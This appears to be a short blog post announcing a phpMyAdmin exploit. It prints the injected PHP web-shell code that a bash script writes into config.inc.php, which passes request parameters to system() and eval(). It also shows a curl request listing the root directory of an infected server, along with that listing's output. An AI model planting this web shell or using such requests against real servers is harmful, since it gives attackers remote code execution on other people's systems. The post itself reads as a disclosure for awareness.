New phpMyAdmin exploit

It\'s a bash script that injects code into config.php allowing remote code execution: $cfg[\'Servers\'][$i][\'host\']=\'\'; if($_GET[\'c\']){echo \'(pre)\';system($_GET[\'c\']);echo \'(/pre)\';}if($_GET[\'p\']){echo \'(pre)\';eval($_GET[\'p\']);echo \'(/pre)\';};//\'] = \'localhost\'; By the way, in a infected system we could execute some commands like this: $ curl \"http://dominio-afectado/phpMyAdmin-3.0.1.1//config/config.inc.php?c=ls+-l+/\" total 96 drwxr-xr-x 2 root root 4096 Mar 11 10:12 bin drwxr-xr-x 3 root root 4096 May 6 10:01 boot drwxr-xr-x 15 root root 14300 Jun 5 09:02 dev drwxr-xr-x 147 root root 12288 Jun 5 09:02 etc drwxr-xr-x 3 root root 4096 Oct 18 2008 home drwxr-xr-x 2 root root 4096 Jul 2 2008 initrd [...] I think you would read the proof of concept carefully.

About the author

Óscar
has doubledaddy super powers, father of Hugo and Nico, husband of Marta, *nix user, Djangonaut and open source passionate.